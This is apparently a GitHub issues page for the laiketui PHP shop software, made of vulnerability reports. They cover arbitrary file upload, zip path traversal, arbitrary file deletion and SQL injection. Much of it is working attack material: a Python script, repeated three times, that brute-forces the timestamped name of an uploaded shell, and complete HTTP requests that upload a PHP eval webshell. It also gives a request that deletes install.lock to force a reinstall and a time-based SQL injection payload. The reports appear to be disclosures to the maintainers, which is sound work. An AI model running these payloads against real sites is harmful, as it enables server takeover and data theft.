bettershop / laiketui Goto Github PK

File Path: LKT/webapp/modules/software/actions/addAction.class.php#L111

This method directly splices the unlimited extension in the file name into the file upload target file extension, and can upload the .php file getshell

But the file name is not sent to the page, but time() is used here to get the current time for splicing
As long as the blasting is carried out back through the current event, under normal circumstances, the number of blasting will not exceed three times
Below is the script I wrote in Python

import time
import socket
import requests

host = "127.0.0.1"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.recv(65535)
client.close()
end = int(time.time())

now = end
coast = end - start

print(f"now: {now}")
def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=add&name=1&image=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 237
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: admin_mojavi=23bgar1r1bq43q0ro3plbrj148; XDEBUG_SESSION=18445
Connection: close

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy

Descriotion

There is an arbitrary file upload vulnerability in the background. An administrator user attacker can upload a .php file to execute malicious code through this vulnerability, thereby gaining control of the system. An attacker can use it to upload a .php file to execute malicious code, thereby obtaining system of control.

Vulnerability details

File Path: LKT/webapp/modules/extension/actions/uploadImgAction.class.php::execute

This method incorrectly splices untrusted file types, resulting in arbitrary file uploads

By modifying the file type in the file upload protocol to: image/php to upload webshell

POST /LKT/index.php?module=extension&action=uploadImg HTTP/1.1
Host: 192.168.157.130
Content-Length: 232
Cache-Control:max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.157.1
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy
User-Agent: Moz1lla/50(Windows N00: Wn64: x64)AppleWebK1t/53736(KFIML like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8.application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Dispositiop:form-data; name="file"; filename="123123.php"
Content-Type: image/php

<?php
var dump($ POST);
@eval($ POST['cmd']);
?>
-----WebKitFormBoundaryGTdxAdrEarGLzRWy

Uploaded webshell successfully

The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross-directory zip files to getshell.

Vulnerability Recurrence:: Log in to the background and visit：/open/app/LKT/index.php?module=system&action=pay To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it.

Then access the path of the malicious file:

poc：

POST /open/app/LKT/index.php?module=system&action=pay HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22809827021874544672920013866
Content-Length: 959
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT/index.php?module=system&action=pay
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=0kbneeltri2qm0ropn901mvb61
Upgrade-Insecure-Requests: 1

-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_id"

0
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_key"

111
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="upload_cert"; filename="debug.zip"
Content-Type: application/x-zip-compressed

//upload file
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_cert"

http://127.0.0.1/open/app/LKT/webapp/lib/cert
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="Submit"


-----------------------------22809827021874544672920013866--

Upload was successful and executed successfully!

When the system is successfully installed, the system will generate the install.lock file in the /data/ directory. When the user wants to reinstall, it will first determine whether the install.lock file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the install.lock file, you can directly reinstall the system.
The parameters $uploadImg, $oldpic, and $imgurl are all controllable：

Vulnerability recurrence: first log in to the background to access the link :
http://your domain /open/app/LKT//index.php?module=Article,and then
publish an article.

Then modify the article:

Before proceeding with any file deletion, visit the install directory:

Replace parameters and delete any files:


Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities.

POST /open/app/LKT//index.php?module=Article&action=modify HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------344640124212804469902957501276
Content-Length: 1265
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT//index.php?module=Article&action=modify&id=2&uploadImg=../LKT/images/
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=79kjqjkl1ntgk4q7se7maqtdcl
Upgrade-Insecure-Requests: 1

-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="id"

2
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="editable"

true
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="uploadImg"

../../
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_title"

222
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_prompt"

111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="sort"

100
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="imgurl"

../../111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="oldpic"

app/data/install.lock
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Submit"


-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="content"

<p>32333<br/></p>
-----------------------------344640124212804469902957501276--

请问有无部署文档？我看你们官网好像没有，没找到，全都是介绍

Any file upload exists at the background plug-in

Locate file： /app/LKT/webapp/modules/plug_ins/actions/addAction.class.php

Firstly, the upload format is not filtered. Secondly, uploading the compressed package will decompress the index file in the compressed package and automatically include the file

As a result, files with any suffix can be uploaded or compressed packages can be uploaded. The compressed packages contain webshell files

Upload succeeded！

The file is in the /APP/LKT/zip/
Let's visit

File Path LKT/webapp/modules/system/actions/payAction.class.php#L63

After uploading as a .zip file, the archive will be decompressed. You can gain system control by putting the php webshell file in the compressed package

Upload a compressed package file with webshell below

Successfully accessed the shell file under LKT/webapp/lib/cert

漏洞成因：在解压时，没有对压缩文件进行过滤判断，导致可以上传跨目录的zip文件直至getshell。

漏洞复现：登陆后台，访问/open/app/LKT/index.php?module=system&action=pay 进行压缩文件上传，将恶意可目录穿越的文件放入zip中，上传解压即可。

File Path: software/actions/programAction.class.php#L217

This method directly splices the unlimited extension in the file name into the file upload target file extension, and can upload the .php file getshell

But the file name is not sent to the page, but time() is used here to get the current time for splicing
As long as the blasting is carried out back through the current event, under normal circumstances, the number of blasting will not exceed three times
Below is the script I wrote in Python

import time
import socket
import requests

host = "127.0.0.1"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.recv(65535)
client.close()
end = int(time.time())

now = end
coast = end - start

print(f"now: {now}")
def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=add&name=1&image=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 237
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: admin_mojavi=23bgar1r1bq43q0ro3plbrj148; XDEBUG_SESSION=18445
Connection: close

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy

The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross-directory zip files to getshell.

Vulnerability Recurrence:: Log in to the background and visit：/open/app/LKT/index.php?module=system&action=pay To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it.

Background SQL injection

Parameter id is not filtered

The corresponding url is http://127.0.0.1/app/LKT/index.php?module=member&action=modify&id=1

Using sleep function to delay 5 seconds as an example

Using sleep function to delay 10 seconds as an example

Get the database through sqlmap

只是点个赞

File Path: LKT/webapp/modules/software/actions/modifyAction.class.php::execute

This method directly splices the unlimited extension in the file name into the file upload target file extension, and can upload the .php file getshell

But the file name is not sent to the page, but time() is used here to get the current time for splicing
As long as the blasting is carried out back through the current event, under normal circumstances, the number of blasting will not exceed three times
Below is the script I wrote in Python

import time
import socket
import requests

host = "192.168.157.130"
port = 80
client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")
data = file.read()
client.send(data)
client.close()
end = int(time.time())

now = end
coast = end - start


def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()


time.sleep(1)
# coast = coast if coast > 3 else 3
for i in range(0, coast + 1):
    f(now)
    now = now - 1

print("No!!!")

HTTP

POST /LKT/index.php?module=software&action=modify&name=1 HTTP/1.1
Host: 192.168.157.1
Content-Length: 238
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://192.168.157.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: admin_mojavi=2h4889d8ov0i77rrl1q15313t6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy

File Path: LKT/webapp/modules/system/actions/uploadImgAction.class.php::execute

This method incorrectly splices untrusted file types, resulting in arbitrary file uploads

By modifying the file type in the file upload protocol to: image/php to upload webshell

Uploaded webshell successfully

SQL injection exists in the LaiKetui menu management function

The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1

Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php

Because the parameter id is not filtered, it leads to SQL injection vulnerabilities

	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id，查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);
	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id，查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);

Use burpsuite to request url http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+

View SQL monitoring

Use sqlmap SQL injection
Get the database